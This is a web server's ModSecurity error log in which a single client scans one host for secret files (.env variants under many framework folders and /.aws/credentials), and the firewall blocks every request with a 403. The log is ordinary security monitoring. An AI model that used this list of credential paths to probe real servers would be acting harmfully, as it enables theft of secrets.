[Sun Jun 08 02:26:22.144866 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aETYrha8k0A1fnYogFi4QwAAAAQ"]
[Sun Jun 08 02:26:23.221827 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aETYrxa8k0A1fnYogFi4RAAAAAQ"]
[Sun Jun 08 02:26:23.222087 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aETYrxa8k0A1fnYogFi4RAAAAAQ"]
[Sun Jun 08 02:26:23.222313 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aETYrxa8k0A1fnYogFi4RAAAAAQ"]
[Sun Jun 08 02:26:24.406759 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aETYsBa8k0A1fnYogFi4RQAAAAQ"]
[Sun Jun 08 02:26:24.406971 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aETYsBa8k0A1fnYogFi4RQAAAAQ"]
[Sun Jun 08 02:26:24.407176 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aETYsBa8k0A1fnYogFi4RQAAAAQ"]
[Sun Jun 08 02:26:27.283995 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aETYsxa8k0A1fnYogFi4RwAAAAQ"]
[Sun Jun 08 02:26:27.284216 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aETYsxa8k0A1fnYogFi4RwAAAAQ"]
[Sun Jun 08 02:26:27.284430 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aETYsxa8k0A1fnYogFi4RwAAAAQ"]
[Sun Jun 08 02:26:28.781286 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aETYtBa8k0A1fnYogFi4SAAAAAQ"]
[Sun Jun 08 02:26:28.781499 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aETYtBa8k0A1fnYogFi4SAAAAAQ"]
[Sun Jun 08 02:26:28.781681 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aETYtBa8k0A1fnYogFi4SAAAAAQ"]
[Sun Jun 08 02:26:29.921306 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aETYtRa8k0A1fnYogFi4SQAAAAQ"]
[Sun Jun 08 02:26:29.921510 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aETYtRa8k0A1fnYogFi4SQAAAAQ"]
[Sun Jun 08 02:26:29.921710 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aETYtRa8k0A1fnYogFi4SQAAAAQ"]
[Sun Jun 08 02:26:34.692796 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aETYuha8k0A1fnYogFi4SgAAAAQ"]
[Sun Jun 08 02:26:34.692967 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aETYuha8k0A1fnYogFi4SgAAAAQ"]
[Sun Jun 08 02:26:34.693147 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aETYuha8k0A1fnYogFi4SgAAAAQ"]
[Sun Jun 08 02:26:36.776002 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aETYvBa8k0A1fnYogFi4SwAAAAQ"]
[Sun Jun 08 02:26:36.776228 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aETYvBa8k0A1fnYogFi4SwAAAAQ"]
[Sun Jun 08 02:26:36.776400 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aETYvBa8k0A1fnYogFi4SwAAAAQ"]
[Sun Jun 08 02:26:38.501820 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aETYvha8k0A1fnYogFi4TQAAAAQ"]
[Sun Jun 08 02:26:38.502045 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aETYvha8k0A1fnYogFi4TQAAAAQ"]
[Sun Jun 08 02:26:38.502222 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aETYvha8k0A1fnYogFi4TQAAAAQ"]
[Sun Jun 08 02:26:39.455104 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aETYvxa8k0A1fnYogFi4TgAAAAQ"]
[Sun Jun 08 02:26:39.455327 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aETYvxa8k0A1fnYogFi4TgAAAAQ"]
[Sun Jun 08 02:26:39.455529 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aETYvxa8k0A1fnYogFi4TgAAAAQ"]
[Sun Jun 08 02:26:40.419194 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aETYwBa8k0A1fnYogFi4TwAAAAQ"]
[Sun Jun 08 02:26:40.419414 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aETYwBa8k0A1fnYogFi4TwAAAAQ"]
[Sun Jun 08 02:26:40.419606 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aETYwBa8k0A1fnYogFi4TwAAAAQ"]
[Sun Jun 08 02:26:41.264458 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aETYwRa8k0A1fnYogFi4UAAAAAQ"]
[Sun Jun 08 02:26:41.264742 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aETYwRa8k0A1fnYogFi4UAAAAAQ"]
[Sun Jun 08 02:26:41.264929 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aETYwRa8k0A1fnYogFi4UAAAAAQ"]
[Sun Jun 08 02:26:42.081968 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aETYwha8k0A1fnYogFi4UQAAAAQ"]
[Sun Jun 08 02:26:42.082192 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aETYwha8k0A1fnYogFi4UQAAAAQ"]
[Sun Jun 08 02:26:42.082393 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aETYwha8k0A1fnYogFi4UQAAAAQ"]
[Sun Jun 08 02:26:43.013268 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aETYwxa8k0A1fnYogFi4UgAAAAQ"]
[Sun Jun 08 02:26:43.013487 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aETYwxa8k0A1fnYogFi4UgAAAAQ"]
[Sun Jun 08 02:26:43.013692 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aETYwxa8k0A1fnYogFi4UgAAAAQ"]
